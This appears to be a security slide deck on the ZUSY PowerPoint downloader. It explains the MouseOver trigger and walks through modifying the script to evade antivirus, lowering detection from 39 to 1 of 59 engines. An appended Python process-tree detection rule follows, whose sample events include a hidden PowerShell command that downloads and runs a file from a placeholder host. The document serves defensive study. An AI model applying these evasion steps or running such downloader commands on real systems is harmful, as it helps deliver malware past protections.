AntiVirus protection is not enough. More advanced EndPoint protection is needed. In this presentation you can see how easy it is to evade a ZUSY threat (downloader script).
2. ZUSY
• The term Zusy has been used to name a threat
that uses a downloader embedded in PowerPoint
documents (.ppsx).
• The threat was found in-the-wild in early June
2017
• It does not use macros
• It does not require even a single ‘click’ (in some
scenarios)
3. ZUSY
• When a malicious ZUSY document is opened we see
something like this:
4. ZUSY
• The document is opened in full-screen mode (.ppsx) and there
are no more slides. This is meant to make the user roll the mouse
over the “link”; when this is done, it activates the “trigger”
5. ZUSY
• Fortunately, in Office 2013 and Office 2010 a warning
message pops up to prevent the user from executing the
malware :P
6. ZUSY
• If the user allows ZUSY's execution, or if the
warning does not appear, the code will be
executed as a consequence of the MouseOver
action defined in ppt/slides/slide1.xml:
• <a:hlinkMouseOver r:id="rId2" action="ppaction://program"/>
• The id="rId2" is resolved in
ppt/slides/_rels/slide1.xml.rels
7. ZUSY
• The code is something like:
• The Target attribute of that relationship contains the malicious script,
URL encoded. Here you can see it decoded:
8. ZUSY
• After replacing [char]0x2F with the “/” character
and formatting the code a little bit:
• Annotations on the script: execution of the file; it downloads a
malicious file into the temporary folder; the ZUSY code is a Downloader
9. ZUSY
• At VirusTotal we can find this sample identified
by its SHA256 hash:
796a386b43f12b99568f55166e339fcf43a4792d292bdd05dafa97ee32518921
11. Modifying ZUSY
• We will now learn how to modify ZUSY to avoid AntiVirus detection.
• The first modification made was the replacement of the malicious
URL cccn.nl/c.php by “blabla.net” and of the name of the original file by
“svchost.exe”
• The code is the following:
12. Modifying ZUSY
• The result in VirusTotal of this scan has the
following detection rate (13 of 59 AVs):
13. Modifying ZUSY
• Clearly many AntiVirus products have a signature only for the malicious site and
/ or the filename, and not for the script itself.
• It is interesting, because if you think about it, a script that downloads a
file and executes it does not necessarily have to be malware.
• However, a PowerPoint that uses a MouseOver action to run a
PowerShell script that downloads a file from the internet and executes
it is difficult not to consider malware. The criteria of certain
AntiVirus products are at least curious.
• Many AntiVirus products have chosen to establish a signature
only for the site and the file. Among others:
• Avast, AVG, ClamAV, Comodo, Ikarus, Fortinet, McAfee, Microsoft,
Panda, Symantec, TrendMicro, etc.
14. Modifying ZUSY
• Since it was easy to lower the detection rate
from 39 to 13 AVs, some additional tests
were performed, and the results indicate that
the rest of the AVs focus on the execution of
PowerShell, the flags and the functions
used (DownloadFile and Invoke-Item)
• We decided to make a more radical
modification: a different implementation of
the downloader.
15. Modifying ZUSY
• This is a VBS (Visual Basic Script) that performs
the same function:
16. Modifying ZUSY
• To be able to execute it, the script must be implemented in this way:
• The script creates a new script (asdf.vbs) that contains the
PowerShell script, and finally it is executed using cscript asdf.vbs (and
deleted after execution)
17. Modifying ZUSY
• After URL encoding it, we put it in
ppt/slides/_rels/slide1.xml.rels:
18. Modifying ZUSY
• The VirusTotal detection of the modified script is
the following (1 of 59 AVs):
19. Modifying ZUSY
• Only the Chinese AntiVirus Qihoo 360 flags it as a suspicious
file.
• The script works: it downloads and executes the payload
20. Conclusion
• AntiVirus evasion of this kind of script (downloaders) is
easy.
• These threats are very dangerous, and computers
should be protected properly, not only by trusting
AntiVirus protection.
• Our recommendation is to deploy an advanced EndPoint
protection that allows a higher level of detection of these
threats and, at the same time, a high level of logging of all
the actions carried out by every process, in order to use
them to identify the threat in depth in case of an incident.
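The conclusion's point is that per-process logging catches what signatures on a URL or filename miss: whichever string is swapped, the chain is still an Office process spawning a script host. The following is an added example written for this page, not the deck's own tooling. It runs a minimal process-tree rule over constructed Sysmon-style process-creation events (hypothetical field names, illustrative paths, not real telemetry) that model both the original chain (POWERPNT.EXE spawning powershell.exe) and the VBS variant from slide 16 (that PowerShell dropping asdf.vbs into Temp and running it with cscript), plus a benign PowerShell started from Explorer that must not fire.

```python
"""Process-tree rule for Office-spawned script hosts.

Added example for this page (not the deck's own tooling). The deck's closing
advice is endpoint logging of every process' actions; this shows the minimal
rule such logs enable. Events are constructed Sysmon-style process-creation
records with hypothetical field names, covering the original chain
(POWERPNT.EXE -> powershell.exe) and the VBS variant, where that PowerShell
drops asdf.vbs into Temp and runs it with cscript.
"""
import re
from typing import NamedTuple


class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    image: str
    cmdline: str


OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cscript.exe", "wscript.exe", "cmd.exe", "mshta.exe"}

# Command-line traits the deck says AV keyed on (flags, DownloadFile, Invoke-Item)
# plus the Temp-resident script of the VBS variant.
CMDLINE_INDICATORS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("downloader API", re.compile(r"DownloadFile|DownloadString|Net\.WebClient", re.I)),
    ("launches downloaded file", re.compile(r"Invoke-Item|Start-Process", re.I)),
    ("script from Temp", re.compile(r"\\Temp\\\S+\.(?:vbs|vbe|js|jse|ps1)", re.I)),
]

# Constructed events (not real telemetry); paths and names are illustrative.
EVENTS = [
    ProcEvent(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1200, 1000, r"C:\Program Files\Microsoft Office\Office15\POWERPNT.EXE",
              r'"POWERPNT.EXE" /S "C:\Users\u\Downloads\invoice.ppsx"'),
    ProcEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoP -W Hidden -c \"(New-Object Net.WebClient)"
              ".DownloadFile('http://example.invalid/c.php',$env:TEMP+'\\a.exe');"
              "Invoke-Item ($env:TEMP+'\\a.exe')\""),
    ProcEvent(1400, 1300, r"C:\Windows\System32\cscript.exe",
              r"cscript C:\Users\u\AppData\Local\Temp\asdf.vbs"),
    ProcEvent(1500, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c Get-Process"),          # admin from Explorer: benign
]


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def chain_to_office(ev, by_pid, max_depth=6):
    """Walk parents; return [office_app, ..., ev] or None if no Office ancestor."""
    chain, cur = [ev], ev
    for _ in range(max_depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            return None
        chain.append(cur)
        if basename(cur.image) in OFFICE_APPS:
            return list(reversed(chain))
    return None


def detect(events):
    """Alert on every script host with an Office application in its ancestry."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if basename(ev.image) not in SCRIPT_HOSTS:
            continue
        chain = chain_to_office(ev, by_pid)
        if chain is None:
            continue
        reasons = [f"{basename(chain[0].image)} is an ancestor of {basename(ev.image)}"]
        reasons += [label for label, rx in CMDLINE_INDICATORS if rx.search(ev.cmdline)]
        alerts.append({"pid": ev.pid,
                       "chain": " > ".join(basename(p.image) for p in chain),
                       "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a["pid"], a["chain"], "|", "; ".join(a["reasons"]))
```

The ancestry walk is what makes the rule survive the deck's second modification: cscript.exe is not a child of POWERPNT.EXE but a grandchild, so a rule that only checks the direct parent would see a PowerShell-spawned cscript and miss the Office origin. The command-line indicators are enrichment for the analyst, not the trigger.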